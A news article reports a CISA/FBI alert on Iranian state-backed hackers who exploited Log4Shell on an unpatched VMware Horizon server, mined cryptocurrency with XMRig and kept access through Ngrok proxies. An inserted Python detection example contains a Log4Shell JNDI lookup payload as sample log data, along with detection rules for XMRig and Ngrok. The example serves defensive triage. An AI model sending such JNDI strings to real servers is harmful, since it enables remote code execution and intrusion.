Iranian Hacker Group Uses Log4Shell to Cryptojack US Agency

Hackers Exploited an Unpatched VMWare Horizon Server to Gain Access
Hackers sponsored by the Iranian government broke into an unnamed U.S. federal agency's network, stole passwords and implanted cryptocurrency mining software, cybersecurity officials disclosed Wednesday.

The Iranian group - the official security alert doesn't supply its name - exploited a vulnerability that was the subject of a governmentwide emergency patching directive issued last December: CVE-2021-44228, better known as Log4Shell. In this case, the hackers found an unpatched VMware Horizon server.

Federal authorities have warned that the vulnerability in the open-source Java utility Log4j is a favorite of nation-state hackers. The utility, maintained by The Apache Software Foundation, is often deployed as a software library in other applications, including other Apache applications and VMware products. The Cyber Safety Review Board, a federally run committee, earlier this year characterized Log4Shell as an "endemic vulnerability" likely to cause problems for up to a decade and possibly even longer (see: Log4j Flaw Is 'Endemic,' Says Cyber Safety Review Board).

The state-backed hackers installed XMRig crypto mining software, moved laterally to the domain controller, compromised credentials and implanted Ngrok reverse proxies on several hosts to maintain persistence, the Cybersecurity and Infrastructure Security Agency and the FBI said in the government alert. The attack likely began in February. CISA says it detected the intrusion in April and worked with the agency in June and July to eradicate the hackers.
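Triage logic for the intrusion chain described above, as an added example that is not from the article or from the CISA/FBI alert: it runs three detection rules (Log4Shell JNDI lookup strings, XMRig, Ngrok) over constructed sample events in an assumed `host|source|message` format, then summarises which stages of the chain were observed on each host.

```python
import re
from collections import defaultdict

# Constructed sample events (hostnames, paths and addresses are invented for this example).
SAMPLE_EVENTS = [
    "horizon01|web|GET /portal/info.jsp HTTP/1.1 ua=${jndi:ldap://203.0.113.5:1389/x}",
    "horizon01|web|GET /portal/info.jsp HTTP/1.1 ua=Mozilla/5.0",
    "host07|proc|parent=explorer.exe image=C:\\ProgramData\\xmrig\\xmrig.exe cmd=-o pool.example:3333",
    "host07|proc|parent=cmd.exe image=C:\\Users\\Public\\ngrok.exe cmd=tcp 3389",
    "host07|proc|parent=explorer.exe image=notepad.exe cmd=",
]

# One rule per stage of the chain in the alert. The patterns are deliberately simple and
# should be tuned to your own log format and to vendor-published obfuscation variants.
RULES = {
    "initial_access_log4shell": re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE),
    "cryptomining_xmrig": re.compile(r"(^|[\\/\s=])xmrig(\.exe)?\b", re.IGNORECASE),
    "persistence_ngrok": re.compile(r"(^|[\\/\s=])ngrok(\.exe)?\b", re.IGNORECASE),
}


def parse_event(line):
    """Split a 'host|source|message' line; the message may itself contain '|'."""
    host, source, message = line.split("|", 2)
    return host, source, message


def scan_events(lines):
    """Return (host, rule_name, message) for every event that matches a rule."""
    hits = []
    for line in lines:
        host, _source, message = parse_event(line)
        for name, pattern in RULES.items():
            if pattern.search(message):
                hits.append((host, name, message))
    return hits


def chain_by_host(hits):
    """Group matched stages per host so an analyst sees how far the chain progressed."""
    stages = defaultdict(set)
    for host, name, _message in hits:
        stages[host].add(name)
    return {host: sorted(names) for host, names in stages.items()}


if __name__ == "__main__":
    for host, names in chain_by_host(scan_events(SAMPLE_EVENTS)).items():
        print(host, "->", ", ".join(names))
```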

Whether the Iranians were acting wholly on Tehran's behalf, on their own behalf, or both, is uncertain. The Department of Justice in September indicted three Iranian hackers affiliated with the Islamic Revolutionary Guard Corps for ransomware without making a direct connection to state-sponsored attacks. A senior Department of Justice official speaking on condition of anonymity suggested the hackers were engaged in a financially motivated side project.

This incident could well be the same, said John Hultquist, head of intelligence analysis at cyberthreat intelligence firm Mandiant. "Iran and their peers depend on contractors to carry out cyberespionage and attack activities. Many of these contractors moonlight as criminals and it can be difficult to distinguish this activity from the work done at the behest of the state," he said.

Log4j is one of the most popular Java logging packages, downloaded by more than 51 million users since December 2021, and 38% of those downloads are still of vulnerable versions, according to one industry estimate.

To prevent attacks against the vulnerable systems, CISA and the FBI recommend that organizations update VMware Horizon and Unified Access Gateway systems to the latest versions. The vulnerable versions are detailed in VMware's security advisory and knowledge base.

About the Author

Rashmi Ramesh

Assistant Editor, Global News Desk, ISMG

Ramesh has seven years of experience writing and editing stories on finance, enterprise and consumer technology, and diversity and inclusion. She has previously worked at formerly News Corp-owned TechCircle, business daily The Economic Times and The New Indian Express.
